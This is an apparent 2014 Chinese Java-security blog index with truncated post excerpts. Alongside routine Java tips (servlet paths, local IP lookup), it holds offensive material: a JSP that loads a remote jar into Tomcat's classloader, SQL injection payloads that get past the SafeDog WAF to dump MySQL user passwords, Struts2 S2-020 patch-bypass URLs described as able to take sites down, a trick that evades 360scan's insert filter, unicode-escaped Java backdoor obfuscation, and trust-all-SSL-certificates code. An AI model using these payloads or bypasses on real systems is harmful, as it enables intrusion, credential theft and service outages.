2014-05-09 10:40:50

2014-05-08 11:00:03

java 反射运行时加载外部jar到Tomcat StandardClassLoader

加载jar这一部分很容易,可是卸载jar就没那么容易了。加载jar的时候需要用反射去调用URLClassLoader的addURL方法。Tomcat的StandardClassLoader继承于URLClassLoader。 <%@ page language="java" pageEncoding="UTF-8"%> <%@ page import="java.util.*"%> <%@page import="java.net.URL"%> <%@page import="java.lang.reflect.Method"%> <%@page import="java.net.URLClassLoader"%> <% URLClassLoader c = (URLClassLoader) getClass().getClassLoader().getParent().getParent(); URL jar = new URL("http://javaweb.org/jars.jar"); try { Method m = URLClassLoader.class.

2014-05-06 15:07:55

安全狗POST SQL注入.

不知为何不拦POST的/*!XXX*/ id=1 and 1=2 union select 1,user,password from mysql.user limit 0,1 id=1200000 /*!union*//*!select*/(1),user,password from mysql.user limit 0,1 <?php $conn = mysql_connect("localhost","root","123456"); mysql_select_db("test"); $sql = "select * from user where id = ".$_POST['id']; echo $sql."<br/>"; $result = mysql_query($sql,$conn); while ( $data = mysql_fetch_array ( $result ) ) { echo $data ['id']."---".$data ['username']."---".$data['passwor

2014-05-06 12:48:32

2014-05-05 14:59:56

javaweb 获取请求文件绝对路径问题-getServletPath();

在之前获取绝对路径用了WEB路径+RequestURI:jsp获取真实或虚拟文件绝对路径,发现这种做法麻烦而又不准确。当请求http://xxx.com/test/假设test下有index.jsp那么request.getRequestURI()是取不到index.jsp的请求的。这时候最好使用:request.getServletPath(),此方法可以获取请求的servlet路径。 getServletPath java.lang.String getServletPath() Returns the part of this request's URL that calls the servlet. This path starts with a "/" character and includes either the servlet name or a path to the servlet, but does not include any extra path information or a query string. Same as the value of the CGI variable SCRIPT_NAME. This method will return an empty string ("") if

2014-04-29 13:01:27

Java 信任所有SSL证书(解决PKIX path building failed问题)

Java在请求某些不受信任的https网站时会报:PKIX path building failed javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target at sun.security.ssl.Alerts.getSSLException(Alerts.java:192) at sun.security.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1884) at sun.security.ssl.Handshaker.fatalSE(Handshaker.java:276) at sun.security.ssl.Handshaker.fatalSE(Handshaker.java:270) at sun.security.ssl.ClientHandshaker.serverCertificate(ClientHandshaker.

2014-04-27 22:27:26

Java获取本地IP异常问题

获取本地IP往往只需要:InetAddress.getLocalHost().getHostAddress()就行了,但是今天在测试的时候发现这个方法并不怎么靠谱。服务器配置有问题导致无法通过主机名获取IP地址从而抛出了一个UnknowHostException。临时的程序解决办法是假设getLocalHost异常则用NetworkInterface方法获取IP: public InetAddress getLocalHostLANAddress() throws UnknownHostException { try { InetAddress candidateAddress = null; for (Enumeration<?> ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements();) { NetworkInterface iface = (NetworkInterface) ifaces.nextElement(); for (Enumeration<?> inetAddrs = iface.getInetAddresses(); inetAddrs.hasMo

2014-04-23 21:23:15

Struts2再曝高危漏洞(S2-020补丁绕过)

之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用! 暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat: http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test 绕过方式是: http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx 补充: 1、高版本需要用单引号': class['classLoader']['resources']['dirContext']['docBase'] 2、请勿随意尝试,漏洞利用代码会让对方网站挂掉 顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。

2014-04-23 14:12:32

Mysql Insert into set语法绕过360scan insert防注入

360scan正则:INSERT\\s+INTO.+?VALUES 其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx = 提交: http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456') 提交set语法: http://localhost/360.php?sql=insert into user set user='admin',pass='123456' 修复方法当然最好是加上set了。

2014-04-21 13:02:48

Java 后门-unicode编码

Java代码默认可以直接全是unicode编码: 假设有如下未编码Java代码: public class Test { public static void main(String[] args) { System.out.println(1); } } 编码后的Java代码: \u0070\u0075\u0062\u006c\u0069\u0063 \u0063\u006c\u0061\u0073\u0073 \u0054\u0065\u0073\u0074 \u007b \u0070\u0075\u0062\u006c\u0069\u0063 \u0073\u0074\u0061\u0074\u0069\u0063 \u0076\u006f\u0069\u0064 \u006d\u0061\u0069\u006e\u0028 \u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d \u0061\u0072\u0067\u0073\u0029 \u007b \u0053\u0079\u0073\u0074\u0065\u006d.out.println\u0028\u0031\u0029\u003b \u007d \u007d 这段代码输出的结果是1,为了以示区别代码中间故意写了十进制的.out.println。